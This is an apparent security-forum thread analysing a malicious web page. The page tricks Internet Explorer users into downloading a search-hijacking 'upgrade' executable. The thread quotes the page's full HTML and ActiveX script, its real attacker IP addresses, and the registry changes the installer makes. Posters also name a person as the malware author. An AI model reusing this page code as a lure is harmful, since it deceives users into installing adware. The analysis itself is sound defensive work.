Another CWS exploit attempt - Analysis, anyone?

While browsing for some information on physics, I encountered a web site called 'cyclotron dot info' (standard URL is not specified lest someone should click on it. Unfortunately, I did not have my HOSTS file activated (I know, I know). Fortunately, I grant script and ActiveX to just a "white list" of sites, so our friends at 'cyclotron' could not hijack my computer. It offered to "upgrade my search page" and apparently tried to run a pair of legitimate ActiveX controls along with an executable (all rejected by IE). My question concerns the usage and scripting of the controls 6BF52A52-394A-11D3-B153-00C04F79FAA6 (Windows Media Player, newer version) and 2D360201-FFF5-11D1-8D03-00A0C959BC0A (DHTMLsafe RichText Edit) as shown in the actual HTML below:

_______________________________________________________________

<html><body onUnload="xit();">
<center>
<font size=+3 face="ms san serif" color=red ><b>Please upgrade your Search Page Now !</b></font><br><img src="grade.gif"><br>
<br>
<a href="search-upgrade-setup.exe"><img src="run.gif" border=0><!-- <img src="no-spyware.gif" border=0>-->
</a><br><br>
Click <b>OPEN</b> or <b>RUN</b> - This software is 100% <b>virus-free/spyware-free</b>.<br>

If the install dialog doesn't show, <a href="search-upgrade-setup.exe">Download Here ! </a> <br>
The Search Page will be available next time you open your browser.
<br><small><a href="http://www.zeropopup.com/terms_of_service.html">Terms of Service.</a></small><br><br>
<img src="grade.gif">
<object id=ie width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'></object>
<object id="xx" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" STYLE="width:1;height:1;top:0;left:0;position:absolute;"

align="middle"><PARAM NAME="ActivateApplets" VALUE="1"><PARAM NAME="ActivateActiveXControls" VALUE="1"></object>
<script>
function xit(){
xx.DOM.Script.open("http://209.51.211.43/se/","_blank","fullscreen=1");
}
function a(){
self.focus();
alert("\n\n\n\n\n Please Upgrade your Internet Explorer !\t\t\n\n Download and Install this Software Now !\t\t\n\n\n\n\n");
ie.launchURL('search-upgrade-setup.exe');
ie.launchURL('search-upgrade-setup.exe');
//setTimeout('xx.DOM.Script.open("http://www.searchxl.com/dir.php","_blank","fullscreen=1");self.focus();',1000);
self.focus();
}
window.onload=function z(){setTimeout("a();",2000);}

</script>
</body>
</html>

_______________________________________________________________


Aside from the obvious attempt to download the executable "search-upgrade-setup.exe", is the author attempting to misuse what are claimed to be safe ActiveX controls? I'm not savvy enough to figure this out - can anyone offer help? (My computer is OK; just want info for educational purposes).

CrackMan
XP/SP2; IE6/SP2; McAfee VirusScan 10 & Personal Firewall 7

 

Hello,
First I'm sure you will find much better info about physics at university sites. Second, sounds a bit weird they would host on a physics cyclotron site - how many people visit there? Although everything is possible.
Third, try that site using Opera / Firefox with / without javascript on and see what happens.
Mrk

 

Neat trick. One wouldn't suspect that a site with that name would lead to adware. But it is a spoof which leads eventually to a search site. I notice this entry in the MVPS Host file: cyclotron.info #[IE-SpyAd]

I'm not sure what the purpose of scripting WMP - it didn't do anything here.

The Dynamic HTML Editing Component (DEC) points to the MSHTML editor. The download page for the setup.exe has this:

<META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>
<body onkeypress="alert('Page is loading.\nPlease wait..!');" " bgcolor="#ffffff" text="#000000" link="#000080" vlink="#800080" alink="#ff0000" bgproperties="fixed" leftmargin="5" marginwidth="5" topmargin="10" marginheight="10">

See:

Microsoft's Dynamic HTML Editing Component (DEC)

Note that the CLSID for DEC referenced in the page code you post is the "safe" one.

Analysis

This exploit runs only in IE, since it uses ActiveX.

If you go to cyclotron.info in a non-ActiveX browser, you are taken directly to a search page:


______________________________________________


_________________________________________________

Looking up IP address for domain: cyclotron.info
The IP address for the domain is: 209.51.211.44

Looking up IP address for domain: i--search.com
The IP address for the domain is: 209.51.211.43
---------------

IE will connect directly to the download page via the script in the cyclotron.info page:

xx. DOM.Script. open "hxxp://209.51.211.43/se/","_blank","fullscreen=1"



_____________________________________________


If you run the setup.exe it installs a Registry file and an entry in a Run Key which loads the IE Search Page which is blank until IE connects out to the site.

----------------------------------------------------------------
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.i--search.com/ie/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Use Search Asst"="no"
"Use Custom Search URL"=dword:00000001
"Default_Search_URL"="http://www.i--search.com/ie/"
"Search Page"="http://www.i--search.com/ie/"
"Search Bar"="http://www.i--search.com/ie/"
"SearchURL"="http://www.i--search.com/ie/"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.i--search.com/ie/"
"CustomizeSearch"="about:blank"
---------------------------------------------------------


___________________________________________________



___________________________________________________


Note that IE does not display the URL of the search page.

----

 

Hi Rmus,

Nice analysis as always !

I went to hxxp://209.51.211.43/se/ and got prompted to ActiveX wanting to run, which i didn't, and then i tried to DL the nice helpful upgrade ( search-upgrade-setup.exe ) which was listed as Virus/Spyware free lol ! This what happend



I then uploaded the file to Jottis and only BD found it with heuristics, which confirms my own PC AV.

File: search-upgrade-setup.exe
Status: POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database)
MD5 b8af7859058289b1f209388b1424e384

BitDefender Found Dropped:Generic.Malware.sp.69239BF6 (probable variant)


StevieO

 

To those who have replied (MrkVonic, Rmus, StevieO, and any others who might have posted while I compose this): I really appreciate your responses. I can only ask Rmus if those screens were from actual execution of a computer that you evidently can clean quickly. Amazing analysis! As for:

That was one of my concerns. The malware author (Asher Nahmias - a well-known hacker) wouldn't seem to want to introduce complications such as a Windows Media Player instance (without specifying a media file!) into the exploit unless there were a reason. I had placed Windows Media and DHTML Editing Component (DEC) into my AllowedControls list because I thought they were darned-near unhackable; this experience gives me second thoughts. Apparently the DEC use is legitimate per Rmus' explanation, but the presence of WMP leaves me wondering.

Interesting result from BitDefender. As a further test, I tried to download (SAVE AS) the executable. McAfee intervened, recognizing the file search-upgrade-setup.exe as: StartPageFN. Sunbelt also lists the file as MWSearch.

Actually, this experience only boosts my confidence in the system's defenses. The machine remains safe because there are several layers of protection, despite the fact that I had left HOSTS unprotected (an application called RenHosts that ping-pongs HOSTS on/off was last executed for the latter; I need to be more careful with that one). Number one, I'm set up to "default-deny" - no script or ActiveX for unknowns. Secondly, if a download is attempted, McAfee rejects it. Thirdly, if McAfee had missed it, IE's default for downloaded executables would have been to block it until "Unblock" is checked in the file attributes. Finally, I have added the following to my Firewall block list:

209.51.211.43-46

CrackMan

 

That´s why it´s best to disable as much ActiveX controls as possible. At the moment I have only 20 controls that are enabled and I have like about 154 disabled including the DHTML Edit control. Actually, it has been known for quite a while that this control can be used in attacks.

 

I guess my attitude is not to disable as many as possible, but to enable what is necessary for most websites without compromising security . Thus, my Admin list is a bit fatter, with 30 controls. Your 20 are probably a subset of mine; in addition, I have some offbeat ones including VML PeerDraw; MathPlayer; Adobe SVG Viewer; IETag Factory; TIMEFactory; and XMRADIO. XM_SystemProfiler, among others, as well as the aforementioned DHTMLsafe RichText Edit. There are two variants of the last item; the first one has been implicated in past attacks. Only the second one is recommended for web page use and for inclusion in Admin lists. If I am not mistaken, the unsafe one cannot be instantiated anyway if the normal DISABLE option is used for "Initialize and script ActiveX controls not marked as safe". The two variants:

2D360200-FFF5-11D1-8D03-00A0C959BC0A The unsafe variant - it allows file access.
2D360201-FFF5-11D1-8D03-00A0C959BC0A DHTMLsafe RichText Edit; init/script-safe.

After reflecting on the exploit, the weakness does not appear to be with DHTMLsafe RichText Edit, but rather with a user who could be hooked into running the executable. There is nothing apparently wrong with either ActiveX control used by the rogue website (DHTMLsafe RichText Edit and Windows Media Player).

CrackMan

 

Hello,
You could dispose with activex altogether - use FF or Opera.
I allow only 2 activex to run - one is windows update and the other is genuine validation tool - that's it.
Mrk

 

Yes but if configured correctly, ActiveX controls should not be a security risk, at least not if you only download trusted ones. And btw, on every Windows system there are many ActiveX controls installed by default, these controls can be a problem since they might be used in attacks, but if you disable most of them the problem should be gone.

 

has any tried this with ie 7.0 (beta release)

 

Even though ActiveX launched the search page:

_____________________________
script>
function xit()
xx.DOM.Script.open("http://209.51.211.43/se/",
_____________________________

The code to download the executable brought up the download prompt even with IE Security set to LOW:

_____________________________________
ie.launchURL('search-upgrade-setup.exe');
_____________________________________



So, this exploit needs a user-click to work.

---